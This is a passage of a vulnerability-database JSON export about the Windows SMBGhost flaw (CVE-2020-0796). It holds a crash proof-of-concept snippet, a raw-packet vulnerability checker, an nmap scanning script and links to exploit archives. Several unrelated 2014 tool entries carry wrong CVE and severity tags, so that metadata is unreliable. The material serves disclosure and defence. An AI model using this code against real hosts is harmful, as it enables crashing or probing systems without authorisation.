https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\n\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip\n", "sourceHref": "https://0day.today/exploit/34171", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34097", "href": "https://0day.today/exploit/description/34097", "sourceData": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)\n\n\n# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\n\n## Usage\n\n`./CVE-2020-0796.py servername`\n\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\n\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\n\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\n\n```python\n def _compress(self, b_data, session):\n header = SMB2CompressionTransformHeader()\n header['original_size'] = len(b_data)\n header['offset'] = 4294967295\n header['data'] = smbprotocol.lznt1.compress(b_data)\n```\n\n## About\n\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\n\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\n\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.\n", "sourceHref": "https://0day.today/exploit/34097", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-15T17:12:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-17T00:00:00", "type": "zdt", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34105", "href": "https://0day.today/exploit/description/34105", "sourceData": "# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution\nVulnerability - remote\n# Author: nu11secur1ty\n# Vendor: https://smb.wsu.edu/\n# Link:\nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796\n# CVE: CVE-2020-0796\n\n\n\n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)\n[+] Website: https://www.nu11secur1ty.com/\n[+] Source: readme from GitHUB\n[+] twitter.com/nu11secur1ty\n\n\n[Exploit Program Code]\n--------------------------------------\nimport socket\nimport struct\nimport sys\n\nsmbsuckmickey_mouse =\nb'\\x00\\x00\\x00\\xc0\\[email\u00a0protected]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00\n\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\nsock = socket.socket(socket.AF_INET)\nsock.settimeout(3)\nsock.connect(( sys.argv[1], 445 ))\nsock.send(smbsuckmickey_mouse)\n\nnb, = struct.unpack(\">I\", sock.recv(4))\nres = sock.recv(nb)\n\nif not res[68:70] == b\"\\x11\\x03\":\n exit(\"Not vulnerable.\")\nif not res[70:72] == b\"\\x02\\x00\":\n exit(\"Not vulnerable.\")\n\nexit(\"Vulnerable.\")\n\n--------------------------------------\n\n#!/usr/bin/bash\nif [ $# -eq 0 ]\nthen\necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR'\nexit 1\nfi\necho \"Checking if there's SMB v3.11 in\" $1 \"...\"\nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P\n'\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report\nfor' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP\n'\\d+\\.\\d+\\.\\d+\\.\\d+'\nif [[ $? != 0 ]]; then\necho \"There's no SMB v3.11\"\nfi\n\n-------------------------------------\n\n[Vendor]\nMicrosoft\n\n\n[Product]\nhttps://smb.wsu.edu/\n\n\n[Vulnerability Type]\nRemote + Layer 2\n\n\n\n[Security Issue]\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n\n[References]\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796\nA remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests.\nAn attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\nTo exploit the vulnerability against a server, an unauthenticated attacker\ncould send a specially crafted packet to a targeted SMBv3 server.\nTo exploit the vulnerability against a client, an unauthenticated attacker\nwould need to configure a malicious SMBv3 server and convince a user to\nconnect to it.\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n[Network Access]\nRemote + Layer 2\n\n\n[Disclosure Timeline]\nPublished: 03/12/2020\n\n\n[+] Disclaimer\nThe entry creation date may reflect when the CVE ID was allocated or\nreserved,\nand does not necessarily indicate when this vulnerability was discovered,\nshared\nwith the affected vendor, publicly disclosed, or updated in CVE.\n", "sourceHref": "https://0day.today/exploit/34105", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:03:04", "description": "[![](https://1.bp.blogspot.com/-LKxabESDj14/XoKTgYcGw8I/AAAAAAAASM8/bIZc6Rafbdo_hDoPJa5CB_gyUxG0sZH8wCK4BGAsYHg/s1600/CVE-2020-0796_1.gif)](<https://1.bp.blogspot.com/-LKxabESDj14/XoKTgYcGw8I/AAAAAAAASM8/bIZc6Rafbdo_hDoPJa5CB_gyUxG0sZH8wCK4BGAsYHg/CVE-2020-0796_1.gif>)\n\n \n\n\nWindows SMBv3 LPE Exploit\n\n \n**Authors** \n\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](<https://twitter.com/danigargu> \"@danigargu\" ))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](<https://twitter.com/dialluvioso_> \"@dialluvioso_\" ))\n \n**References** \n\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n * <https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html>\n * <https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter>\n * <https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/>\n * <http://blogs.360.cn/post/CVE-2020-0796.html>\n * <https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/>\n \n \n\n\n**[Download CVE-2020-0796](<https://github.com/danigargu/CVE-2020-0796> \"Download CVE-2020-0796\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-31T00:50:00", "type": "kitploit", "title": "CVE-2020-0796 - Windows SMBv3 LPE Exploit #SMBGhost", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-31T00:50:42", "id": "KITPLOIT:7720212798779518234", "href": "http://www.kitploit.com/2020/03/cve-2020-0796-windows-smbv3-lpe-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-18T12:06:35", "description": "[![](https://1.bp.blogspot.com/-KHGlAt6h7zA/XoKSZMHlGpI/AAAAAAAASMg/Nwi18b4Lt1Yh1j27FYxFAhzzRfLxDRFEACK4BGAsYHg/s1600/CVE-2020-0796-POC_1_demo.gif)](<https://1.bp.blogspot.com/-KHGlAt6h7zA/XoKSZMHlGpI/AAAAAAAASMg/Nwi18b4Lt1Yh1j27FYxFAhzzRfLxDRFEACK4BGAsYHg/CVE-2020-0796-POC_1_demo.gif>)\n\n \n\n\n(c) 2020 ZecOps, Inc. - <https://www.zecops.com> \\- Find Attackers' Mistakes\n\nPOC to check for CVE-2020-0796 / \"SMBGhost\" \nExpected outcome: Blue Screen \nIntended only for educational and [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) in corporate environments. \nZecOps takes no responsibility for the code, use at your own risk. \nPlease contact some-email@example.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.\n\n \n**Usage** \n\n\n`CVE-2020-0796-POC.exe [<TargetServer>]`\n\nIf `<TargetServer>` is omitted, the POC is executed on localhost (`127.0.0.1`).\n\n \n\n\n**Compiled POC** \n\n\nYou can get the compiled POC [here](<https://github.com/ZecOps/CVE-2020-0796-POC/releases> \"here\" ).\n\n \n**Compiling** \n\n\nUse Visual Studio to compile the following projects:\n\n 1. `ProtoSDK\\Asn1Base\\Asn1Base.csproj`\n 2. `ProtoSDK\\MS-XCA\\Xca.csproj`\n 3. `ProtoSDK\\MS-SMB2\\Smb2.sln`\n\nUse the resulting exe file to run the POC.\n\n \n**References** \n\n\n * [Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog](<https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/> \"Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog\" )\n * [CVE-2020-0796 - ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796> \"CVE-2020-0796 -\" )[Microsoft](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Security Response Center\n * [SMBGhost ](<https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html> \"SMBGhost\" )[Analysis](<https://www.kitploit.com/search/label/Analysis> \"Analysis\" ) \\- Lucas Georges\n \n \n\n\n**[Download CVE-2020-0796-POC](<https://github.com/ZecOps/CVE-2020-0796-POC> \"Download CVE-2020-0796-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-31T00:47:00", "type": "kitploit", "title": "CVE-2020-0796 - CVE-2020-0796 Pre-Auth POC", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-31T00:47:28", "id": "KITPLOIT:5857572574369273543", "href": "http://www.kitploit.com/2020/03/cve-2020-0796-cve-2020-0796-pre-auth-poc.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:54:00", "description": "[ ![](https://2.bp.blogspot.com/-eh5dzO_d7iE/U4DlRl7quNI/AAAAAAAACg4/TmLE71qVZpk/s1600/Securely+and+anonymously+share+a+file+of+any+size.png) ](<https://2.bp.blogspot.com/-eh5dzO_d7iE/U4DlRl7quNI/AAAAAAAACg4/TmLE71qVZpk/s1600/Securely+and+anonymously+share+a+file+of+any+size.png>)\n\n \n\n\nOnionShare lets you securely and anonymously share a file of any size with someone. It works by starting a web server, making it accessible as a Tor hidden service, and generating an unguessable URL access and download the file. It doesn't require setting up a server on the internet somewhere or using a third party filesharing service. You host the file on your own computer and use a Tor hidden service to make it temporarily accessible over the internet. The other user just needs to use Tor Browser to download the file from you. \n\n \n \n\n\n[ Download Onionshare ](<https://github.com/micahflee/onionshare>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-24T18:35:28", "type": "kitploit", "title": "Onionshare - Securely and anonymously share a file of any size", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-24T18:35:28", "id": "KITPLOIT:7904361679234881900", "href": "http://www.kitploit.com/2014/05/onionshare-securely-and-anonymously.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T06:43:58", "description": "[ ![](https://1.bp.blogspot.com/-i4ByqGzN4XQ/U4VDBNpjtuI/AAAAAAAACiQ/e1LQK5dLDok/s1600/kali-1.0.7-released.png) ](<https://1.bp.blogspot.com/-i4ByqGzN4XQ/U4VDBNpjtuI/AAAAAAAACiQ/e1LQK5dLDok/s1600/kali-1.0.7-released.png>)\n\n \n\n\n[ ](<https://www.kali.org/author/muts/>)\n\n \n\n\n#### Kernel 3.14, Tool Updates, Package Improvements \n\nKali linux 1.0.7 has just been released, complete with a whole bunch of tool updates, a new kernel, and some cool new features. Check out our [ changelog ](<https://bugs.kali.org/changelog_page.php> \"Kali Linux Changelog\" ) for a full list of these items. As usual, you don\u2019t need to re-download or re-install Kali to benefit from these updates \u2013 you can update to the latest and greatest using these simple commands: \n\n \n \n apt-get update\n apt-get dist-upgrade\n # If you've just updated your kernel, then:\n reboot\n\n#### Kali Linux Encrypted USB Persistence \n\nOne of the new sought out features introduced (which is also partially responsible for the kernel update) is the ability to create [ Kali Linux Live USB with LUKS Encrypted Persistence ](<https://www.offensive-security.com/kali-linux/kali-encrypted-usb-persistence/> \"Kali Linux LIVE with LUKS Encrypted USB Persistence \" ) . This feature ushers in a new era of secure Kali Linux USB portability, allowing us to either boot to a \u201cclean\u201d Kali image or alternatively, overlay it with the contents of a persistent encrypted partition, all within the same USB drive. \n\n#### Tool Developers Ahoy! \n\nThis release also marks the beginning of some co-ordinated efforts between Kali developers and tool developers to make sure their tools are represented correctly and are fully functional within Kali Linux. We would like to thank the metasploit, w3af, and wpscan dev teams for working with us to perfect their Kali packages and hope that more tool developers join in. Tool developers are welcome to send us an email to ![](https://www.kali.org/wp-content/uploads/2014/05/info-email-fix.jpg) and we\u2019ll be happy to work with you to better integrate your tool into Kali. \n\n#### Kali Linux: Greater Than the Sum of its Parts \n\nFor quite some time now, we\u2019ve been preaching that Kali Linux is more than a \u201cLinux distribution with a collection of tools in it\u201d. We invest a significant of time and resources developing and enabling features in the distribution which we think are useful for penetration testers and other security professionals. These features range from things like \u201c ** live-build ** \u201c, which allows our end users to easily customize their own Kali ISOs to features like ** Live USB persistence encryption ** , which provides paranoid users with an extra layer of security. Many of these features are unique to Kali and can be found nowhere else. We\u2019ve started tallying these features and linking them from our [ Kali documentation page ](<https://www.kali.org/official-documentation/> \"Official Documentation\" ) \u2013 check it out, it\u2019s growing to be an impressive list! \n\n#### Torrents, Virtual Machine & ARM images \n\n \n\n\nIn the next few days, [ Offensive Security ](<https://www.offensive-security.com/> \"Offensive Security Training\" ) will post Virtual Machine and custom ARM images for the 1.0.7 release. We will announce the availability of these images via our blogs and Twitter feeds, so stay tuned!. \n\n \n\n\n \n\n\n** [ Source ](<https://www.kali.org/news/kali-linux-1-0-7-released/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-28T02:04:47", "type": "kitploit", "title": "Kali Linux 1.0.7 Released", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-28T02:04:47", "id": "KITPLOIT:8455936192163161094", "href": "http://www.kitploit.com/2014/05/kali-linux-107-released.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:42:24", "description": "[ ![](https://2.bp.blogspot.com/-TcwB9LPd9fE/U4KoNjeKgiI/AAAAAAAAChU/RYyHB5IYxh0/s1600/Productivity+Tool.png) ](<https://2.bp.blogspot.com/-TcwB9LPd9fE/U4KoNjeKgiI/AAAAAAAAChU/RYyHB5IYxh0/s1600/Productivity+Tool.png>)\n\n \n\n\nHave you ever spent ages trying to find the results of a particular portscan you were sure you did? Or grepping through a bunch of files looking for data for a particular host or service? Or copy-pasting bits of output from a bunch of typescripts into a report? We certainly did, and that's why we wrote MagicTree - so that it does such mind-numbing stuff for us, while we spend our time hacking. \n\n \n\n\nMagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and (yeah!) report generation. In case you wonder, \"Tree\" is because all the data is stored in a tree structure, and \"Magic\" is because it is designed to magically do the most cumbersome and boring part of penetration testing - data management and reporting. \n\n \n** Installation ** \n\n\nNo installation is required for MagicTree. The application is distrubuted as a single JAR file which has to be executed with JRE. Just save the file on your desktop. Double-click on it to execute it or, for less user-friendly OSes, issue \u201cjava -jar MagicTree.jar\u2019 command. \n \n \n\n\n[ ** Download MagicTree ** ](<http://www.gremwell.com/download>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-26T02:36:37", "type": "kitploit", "title": "MagicTree - Penetration Tester Productivity Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-26T02:36:37", "id": "KITPLOIT:5374829754140275290", "href": "http://www.kitploit.com/2014/05/magictree-penetration-tester.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:44:44", "description": "[ ![](https://1.bp.blogspot.com/-Q3RM4C1vfqI/U4P-skRxCRI/AAAAAAAACiA/M0qMzm4YPpE/s1600/hashcat-logo.png) ](<https://1.bp.blogspot.com/-Q3RM4C1vfqI/U4P-skRxCRI/AAAAAAAACiA/M0qMzm4YPpE/s1600/hashcat-logo.png>)\n\n \n\n\n_ ** oclHashcat ** _ is a GPGPU-based multi-hash cracker using a brute-force attack (implemented as mask attack), combinator attack, dictionary attack, hybrid attack, mask attack, and rule-based attack. \n\n \n\n\nThis GPU cracker is a fusioned version of oclHashcat-plus and oclHashcat-lite. \n\n \n\n\n** GPU Driver requirements: **\n\n * NV users require ForceWare 331.67 or later \n * AMD users require Catalyst 14.4 or later \n\n### ** Changelog v1.21 **\n\nThis release is focused on performance increase / bugfixes. \n\n * Added support for algorithm -m 2612 = PHPS \n * Added support for algorithm -m 8600 = Lotus Notes/Domino 5 \n * Added support for algorithm -m 8700 = Lotus Notes/Domino 6 \n * Fixed performance drop on descrypt, LM and oracle-old initiated by AMD drivers \n * Fixed problem with restoring ADL performance state when the clock size reported by the AMD driver didn\u2019t respect the clock step size \n * Fixed problem with setting ADL powertune value for r9 295\u00d72 GPUs \n * Added support for writing logfiles \n * Added parameter \u2013logfile-disable which should be self-explaining \n * Dictstat is now no longer session dependent and will always be based on oclHashcat installation directory \n * Use AMD custom profile settings instead of basing the AMD powertune/clock settings on maximum supported clock values \n * Fixed VLIW size calculated by compute capability was broken for sm_50 -> cuModuleLoad() 301 \n * Make \u2013runtime count relative to real attack start not program start \n * Fixed bug with fan speed handling, if fan speed is manually set to a high enought value (e.g. 100%) oclHashcat shouldn\u2019t change it \n * Problem with username parsing (\u2013username) was fixed \n * Fixed problem where IKE-PSK sha1/md5 (-m 5300/-m 5400) were wrongly recognized as shadow file formats \n * Fixed problem where the \u2018delete range\u2019 rule (xNM) did not allow to remove charaters at the very end of the word \n\nFull Changelog: [ here ](<https://hashcat.net/forum/thread-3422.html>)\n\n \n\n\n### ** Features **\n\n * Worlds fastest password cracker \n * Worlds first and only GPGPU based rule engine \n * Free \n * Multi-GPU (up to 128 gpus) \n * Multi-Hash (up to 100 million hashes) \n * Multi-OS (Linux & Windows native binaries) \n * Multi-Platform (OpenCL & CUDA support) \n * Multi-Algo (see below) \n * Low resource utilization, you can still watch movies or play games while cracking \n * Focuses highly iterated modern hashes \n * Focuses dictionary based attacks \n * Supports distributed cracking \n * Supports pause / resume while cracking \n * Supports sessions \n * Supports restore \n * Supports reading words from file \n * Supports reading words from stdin \n * Supports hex-salt \n * Supports hex-charset \n * Built-in benchmarking system \n * Integrated thermal watchdog \n * 100+ Algorithms implemented with performance in mind \n\n \n\n\n### ** Attack-Modes **\n\n * Straight (accept Rules) \n * Combination \n * Brute-force \n * Hybrid dict + mask \n * Hybrid mask + dict \n\n \n\n\n** Algorithms **\n\n * MD4 \n * MD5 \n * SHA1 \n * SHA-256 \n * SHA-512 \n * SHA-3 (Keccak) \n * RipeMD160 \n * Whirlpool \n * GOST R 34.11-94 \n * HMAC-MD5 (key = $pass) \n * HMAC-MD5 (key = $salt) \n * HMAC-SHA1 (key = $pass) \n * HMAC-SHA1 (key = $salt) \n * HMAC-SHA256 (key = $pass) \n * HMAC-SHA256 (key = $salt) \n * HMAC-SHA512 (key = $pass) \n * HMAC-SHA512 (key = $salt) \n * LM \n * NTLM \n * DCC \n * DCC2 \n * NetNTLMv1 \n * NetNTLMv1 + ESS \n * NetNTLMv2 \n * Kerberos 5 AS-REQ Pre-Auth etype 23 \n * AIX {smd5} \n * AIX {ssha1} \n * AIX {ssha256} \n * AIX {ssha512} \n * FreeBSD MD5 \n * OpenBSD Blowfish \n * descrypt \n * md5crypt \n * bcrypt \n * 